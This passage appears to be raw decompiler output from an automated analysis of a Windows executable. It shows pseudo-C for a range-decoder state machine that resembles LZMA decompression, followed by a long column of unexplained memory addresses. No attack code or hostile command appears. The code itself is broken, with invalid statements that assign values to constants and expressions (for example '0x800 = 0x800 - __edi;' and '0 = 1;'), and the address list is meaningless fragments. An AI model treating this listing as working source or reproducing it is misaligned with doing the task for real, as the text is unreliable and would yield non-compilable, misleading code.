									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                    0x00000000
                                                    0x00406c26
                                                    0x00406c26
                                                    0x00406c2a
                                                    0x00406ce1
                                                    0x00406ce4
                                                    0x00406cf0
                                                    0x00406bd1
                                                    0x00406bd1
                                                    0x00406bd4
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00406f49
                                                    0x00406f49
                                                    0x00406f4f
                                                    0x00406f55
                                                    0x00406f5b
                                                    0x00406f75
                                                    0x00406f78
                                                    0x00406f7e
                                                    0x00406f89
                                                    0x00406f8b
                                                    0x00406f5d
                                                    0x00406f5d
                                                    0x00406f6c
                                                    0x00406f70
                                                    0x00406f70
                                                    0x00406f95
                                                    0x00406fbc
                                                    0x00406fbc
                                                    0x00406fc2
                                                    0x00406fc2
                                                    0x00000000
                                                    0x00406f97
                                                    0x00406f97
                                                    0x00406f9b
                                                    0x0040714a
                                                    0x00000000
                                                    0x0040714a
                                                    0x00406fa7
                                                    0x00406fae
                                                    0x00406fb6
                                                    0x00406fb9
                                                    0x00000000
                                                    0x00406fb9
                                                    0x00406c30
                                                    0x00406c34
                                                    0x00407175
                                                    0x00407175
                                                    0x00407178
                                                    0x0040717c
                                                    0x0040717c
                                                    0x00406c3a
                                                    0x00406c40
                                                    0x00406c43
                                                    0x00406c47
                                                    0x00406c4a
                                                    0x00406c4e
                                                    0x00407114
                                                    0x00407160
                                                    0x00407168
                                                    0x0040716f
                                                    0x00407171
                                                    0x00000000
                                                    0x00407171
                                                    0x00406c54
                                                    0x00406c57
                                                    0x00406c5d
                                                    0x00406c5f
                                                    0x00406c5f
                                                    0x00406c62
                                                    0x00406c65
                                                    0x00406c68
                                                    0x00406c6b
                                                    0x00406c6e
                                                    0x00406c71
                                                    0x00406c72
                                                    0x00406c74
                                                    0x00406c74
                                                    0x00406c74
                                                    0x00406c77
                                                    0x00406c7a
                                                    0x00406c7d
                                                    0x00406c80
                                                    0x00406c80
                                                    0x00406c83
                                                    0x00406c85
                                                    0x00406c85
                                                    0x00406c88
                                                    0x00406c88
                                                    0x00406c88
                                                    0x0040675e
                                                    0x0040675e
                                                    0x00406767
                                                    0x00000000
                                                    0x00000000
                                                    0x0040676d
                                                    0x00000000
                                                    0x00406778
                                                    0x00000000
                                                    0x00000000
                                                    0x00406781
                                                    0x00406784
                                                    0x00406787
                                                    0x0040678b
                                                    0x00000000
                                                    0x00000000
                                                    0x00406791
                                                    0x00406794
                                                    0x00406796
                                                    0x00406797
                                                    0x0040679a
                                                    0x0040679c
                                                    0x0040679d
                                                    0x0040679f
                                                    0x004067a2
                                                    0x004067a7
                                                    0x004067ac
                                                    0x004067b5
                                                    0x004067c8
                                                    0x004067cb
                                                    0x004067d7
                                                    0x004067ff
                                                    0x00406801
                                                    0x0040680f
                                                    0x0040680f
                                                    0x00406813
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406803
                                                    0x00406803
                                                    0x00406806
                                                    0x00406807
                                                    0x00406807
                                                    0x00000000
                                                    0x00406803
                                                    0x004067dd
                                                    0x004067e2
                                                    0x004067e2
                                                    0x004067eb
                                                    0x004067f3
                                                    0x004067f6
                                                    0x00000000
                                                    0x004067fc
                                                    0x004067fc
                                                    0x00000000
                                                    0x004067fc
                                                    0x00000000
                                                    0x00406819
                                                    0x00406819
                                                    0x0040681d
                                                    0x004070c9
                                                    0x00000000
                                                    0x004070c9
                                                    0x00406826
                                                    0x00406836
                                                    0x00406839
                                                    0x0040683c
                                                    0x0040683c
                                                    0x0040683c
                                                    0x0040683f
                                                    0x00406843
                                                    0x00000000
                                                    0x00000000
                                                    0x00406845
                                                    0x0040684b
                                                    0x00406875
                                                    0x0040687b
                                                    0x00406882
                                                    0x00000000
                                                    0x00406882
                                                    0x00406851
                                                    0x00406854
                                                    0x00406859
                                                    0x00406859
                                                    0x00406864
                                                    0x0040686c
                                                    0x0040686f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004068b4
                                                    0x004068ba
                                                    0x004068bd
                                                    0x004068ca
                                                    0x004068d2
                                                    0x00000000
                                                    0x00000000
                                                    0x00406889
                                                    0x00406889
                                                    0x0040688d
                                                    0x004070d8
                                                    0x00000000
                                                    0x004070d8
                                                    0x00406899
                                                    0x004068a4
                                                    0x004068a4
                                                    0x004068a4
                                                    0x004068a7
                                                    0x004068aa
                                                    0x004068ad
                                                    0x004068b2
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004068da
                                                    0x004068dc
                                                    0x004068df
                                                    0x00406950
                                                    0x00406953
                                                    0x00406956
                                                    0x0040695d
                                                    0x00406967
                                                    0x00000000
                                                    0x00406967
                                                    0x004068e1
                                                    0x004068e5
                                                    0x004068e8
                                                    0x004068ea
                                                    0x004068ed
                                                    0x004068f0
                                                    0x004068f2
                                                    0x004068f5
                                                    0x004068f7
                                                    0x004068fc
                                                    0x004068ff
                                                    0x00406902
                                                    0x00406906
                                                    0x0040690d
                                                    0x00406910
                                                    0x00406917
                                                    0x0040691b
                                                    0x00406923
                                                    0x00406923
                                                    0x00406923
                                                    0x0040691d
                                                    0x0040691d
                                                    0x0040691d
                                                    0x00406912
                                                    0x00406912
                                                    0x00406912
                                                    0x00406927
                                                    0x0040692a
                                                    0x00406948
                                                    0x0040694a
                                                    0x00000000
                                                    0x0040692c
                                                    0x0040692c
                                                    0x0040692f
                                                    0x00406932
                                                    0x00406935
                                                    0x00406937
                                                    0x00406937
                                                    0x00406937
                                                    0x0040693a
                                                    0x0040693d
                                                    0x0040693f
                                                    0x00406940
                                                    0x00406943
                                                    0x00000000
                                                    0x00406943
                                                    0x00000000
                                                    0x00406b79
                                                    0x00406b7d
                                                    0x00406b9b
                                                    0x00406b9e
                                                    0x00406ba5
                                                    0x00406ba8
                                                    0x00406bab
                                                    0x00406bae
                                                    0x00406bb1
                                                    0x00406bb4
                                                    0x00406bb6
                                                    0x00406bbd
                                                    0x00406bbe
                                                    0x00406bc0
                                                    0x00406bc3
                                                    0x00406bc6
                                                    0x00406bc9
                                                    0x00406bc9
                                                    0x00406bce
                                                    0x00000000
                                                    0x00406bce
                                                    0x00406b7f
                                                    0x00406b82
                                                    0x00406b85
                                                    0x00406b8f
                                                    0x00000000
                                                    0x00000000
                                                    0x00406be3
                                                    0x00406be7
                                                    0x00406c0a
                                                    0x00406c0d
                                                    0x00406c10
                                                    0x00406c1a
                                                    0x00406be9
                                                    0x00406be9
                                                    0x00406bec
                                                    0x00406bef
                                                    0x00406bf2
                                                    0x00406bff
                                                    0x00406c02
                                                    0x00406c02
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c97
                                                    0x00406c9b
                                                    0x00406ca2
                                                    0x00406ca5
                                                    0x00406ca8
                                                    0x00406cb2
                                                    0x00000000
                                                    0x00406cb2
                                                    0x00406c9d
                                                    0x00000000
                                                    0x00000000
                                                    0x00406cbe
                                                    0x00406cc2
                                                    0x00406cc9
                                                    0x00406ccc
                                                    0x00406ccf
                                                    0x00406cc4
                                                    0x00406cc4
                                                    0x00406cc4
                                                    0x00406cd2
                                                    0x00406cd5
                                                    0x00406cd8
                                                    0x00406cd8
                                                    0x00406cdb
                                                    0x00406cde
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d7e
                                                    0x00406d7e
                                                    0x00406d82
                                                    0x00407120
                                                    0x00000000
                                                    0x00407120
                                                    0x00406d88
                                                    0x00406d8b
                                                    0x00406d8e
                                                    0x00406d92
                                                    0x00406d95
                                                    0x00406d9b
                                                    0x00406d9d
                                                    0x00406d9d
                                                    0x00406d9d
                                                    0x00406da0
                                                    0x00406da3
                                                    0x00000000
                                                    0x00000000
                                                    0x00406973
                                                    0x00406973
                                                    0x00406977
                                                    0x004070e4
                                                    0x00000000
                                                    0x004070e4
                                                    0x0040697d
                                                    0x00406980
                                                    0x00406983
                                                    0x00406987
                                                    0x0040698a
                                                    0x00406990
                                                    0x00406992
                                                    0x00406992
                                                    0x00406992
                                                    0x00406995
                                                    0x00406998
                                                    0x00406998
                                                    0x0040699b
                                                    0x0040699e
                                                    0x00000000
                                                    0x00000000
                                                    0x004069a4
                                                    0x004069aa
                                                    0x00000000
                                                    0x00000000
                                                    0x004069b0
                                                    0x004069b0
                                                    0x004069b4
                                                    0x004069b7
                                                    0x004069ba
                                                    0x004069bd
                                                    0x004069c0
                                                    0x004069c1
                                                    0x004069c4
                                                    0x004069c6
                                                    0x004069cc
                                                    0x004069cf
                                                    0x004069d2
                                                    0x004069d5
                                                    0x004069d8
                                                    0x004069db
                                                    0x004069de
                                                    0x004069fa
                                                    0x004069fd
                                                    0x00406a00
                                                    0x00406a03
                                                    0x00406a0a
                                                    0x00406a0e
                                                    0x00406a10
                                                    0x00406a14
                                                    0x004069e0
                                                    0x004069e0
                                                    0x004069e4
                                                    0x004069ec
                                                    0x004069f1
                                                    0x004069f3
                                                    0x004069f5
                                                    0x004069f5
                                                    0x00406a17
                                                    0x00406a1e
                                                    0x00406a21
                                                    0x00000000
                                                    0x00406a27
                                                    0x00000000
                                                    0x00406a27
                                                    0x00000000
                                                    0x00406a2c
                                                    0x00406a2c
                                                    0x00406a30
                                                    0x004070f0
                                                    0x00000000
                                                    0x004070f0
                                                    0x00406a36
                                                    0x00406a39
                                                    0x00406a3c
                                                    0x00406a40
                                                    0x00406a43
                                                    0x00406a49
                                                    0x00406a4b
                                                    0x00406a4b
                                                    0x00406a4b
                                                    0x00406a4e
                                                    0x00406a51
                                                    0x00406a51
                                                    0x00406a51
                                                    0x00406a57
                                                    0x00000000
                                                    0x00000000
                                                    0x00406a59
                                                    0x00406a5c
                                                    0x00406a5f
                                                    0x00406a62
                                                    0x00406a65
                                                    0x00406a68
                                                    0x00406a6b
                                                    0x00406a6e
                                                    0x00406a71
                                                    0x00406a74
                                                    0x00406a77
                                                    0x00406a8f
                                                    0x00406a92
                                                    0x00406a95
                                                    0x00406a98
                                                    0x00406a98
                                                    0x00406a9b
                                                    0x00406a9f
                                                    0x00406aa1
                                                    0x00406a79
                                                    0x00406a79
                                                    0x00406a81
                                                    0x00406a86
                                                    0x00406a88
                                                    0x00406a8a
                                                    0x00406a8a
                                                    0x00406aa4
                                                    0x00406aab
                                                    0x00406aae
                                                    0x00000000
                                                    0x00406ab0
                                                    0x00000000
                                                    0x00406ab0
                                                    0x00406aae
                                                    0x00406ab5
                                                    0x00406ab5
                                                    0x00406ab5
                                                    0x00406ab5
                                                    0x00000000
                                                    0x00000000
                                                    0x00406af0
                                                    0x00406af0
                                                    0x00406af4
                                                    0x004070fc
                                                    0x00000000
                                                    0x004070fc
                                                    0x00406afa
                                                    0x00406afd
                                                    0x00406b00
                                                    0x00406b04
                                                    0x00406b07
                                                    0x00406b0d
                                                    0x00406b0f
                                                    0x00406b0f
                                                    0x00406b0f
                                                    0x00406b12
                                                    0x00406b15
                                                    0x00406b15
                                                    0x00406b1b
                                                    0x00406ab9
                                                    0x00406ab9
                                                    0x00406abc
                                                    0x00000000
                                                    0x00406abc
                                                    0x00406b1d
                                                    0x00406b1d
                                                    0x00406b20
                                                    0x00406b23
                                                    0x00406b26
                                                    0x00406b29
                                                    0x00406b2c
                                                    0x00406b2f
                                                    0x00406b32
                                                    0x00406b35
                                                    0x00406b38
                                                    0x00406b3b
                                                    0x00406b53
                                                    0x00406b56
                                                    0x00406b59
                                                    0x00406b5c
                                                    0x00406b5c
                                                    0x00406b5f
                                                    0x00406b63
                                                    0x00406b65
                                                    0x00406b3d
                                                    0x00406b3d
                                                    0x00406b45
                                                    0x00406b4a
                                                    0x00406b4c
                                                    0x00406b4e
                                                    0x00406b4e
                                                    0x00406b68
                                                    0x00406b6f
                                                    0x00406b72
                                                    0x00000000
                                                    0x00406b74
                                                    0x00000000
                                                    0x00406b74
                                                    0x00000000
                                                    0x00406e01
                                                    0x00406e01
                                                    0x00406e05
                                                    0x0040712c
                                                    0x00000000
                                                    0x0040712c
                                                    0x00406e0b
                                                    0x00406e0e
                                                    0x00406e11
                                                    0x00406e15
                                                    0x00406e18
                                                    0x00406e1e
                                                    0x00406e20
                                                    0x00406e20
                                                    0x00406e20
                                                    0x00406e23
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406f10
                                                    0x00406f14
                                                    0x00406f36
                                                    0x00406f39
                                                    0x00406f43
                                                    0x00000000
                                                    0x00406f43
                                                    0x00406f16
                                                    0x00406f19
                                                    0x00406f1d
                                                    0x00406f20
                                                    0x00406f20
                                                    0x00406f23
                                                    0x00000000
                                                    0x00000000
                                                    0x00406fcd
                                                    0x00406fd1
                                                    0x00406fef
                                                    0x00406fef
                                                    0x00406fef
                                                    0x00406ff6
                                                    0x00406ffd
                                                    0x00407004
                                                    0x00407004
                                                    0x00000000
                                                    0x00407004
                                                    0x00406fd3
                                                    0x00406fd6
                                                    0x00406fd9
                                                    0x00406fdc
                                                    0x00406fe3
                                                    0x00406f27
                                                    0x00406f27
                                                    0x00406f2a
                                                    0x00000000
                                                    0x00000000
                                                    0x004070be
                                                    0x004070c1
                                                    0x00000000
                                                    0x00000000
                                                    0x00406cf8
                                                    0x00406cfa
                                                    0x00406d01
                                                    0x00406d02
                                                    0x00406d04
                                                    0x00406d07
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d0f
                                                    0x00406d12
                                                    0x00406d15
                                                    0x00406d17
                                                    0x00406d19
                                                    0x00406d19
                                                    0x00406d1a
                                                    0x00406d1d
                                                    0x00406d24
                                                    0x00406d27
                                                    0x00406d35
                                                    0x00000000
                                                    0x00000000
                                                    0x0040700b
                                                    0x0040700b
                                                    0x0040700e
                                                    0x00407015
                                                    0x00000000
                                                    0x00000000
                                                    0x0040701a
                                                    0x0040701a
                                                    0x0040701e
                                                    0x00407156
                                                    0x00000000
                                                    0x00407156
                                                    0x00407024
                                                    0x00407027
                                                    0x0040702a
                                                    0x0040702e
                                                    0x00407031
                                                    0x00407037
                                                    0x00407039
                                                    0x00407039
                                                    0x00407039
                                                    0x0040703c
                                                    0x0040703f
                                                    0x0040703f
                                                    0x0040703f
                                                    0x0040703f
                                                    0x00407042
                                                    0x00407042
                                                    0x00407046
                                                    0x004070a6
                                                    0x004070a9
                                                    0x004070ae
                                                    0x004070af
                                                    0x004070b1
                                                    0x004070b3
                                                    0x004070b6
                                                    0x00000000
                                                    0x004070b6
                                                    0x00407048
                                                    0x0040704e
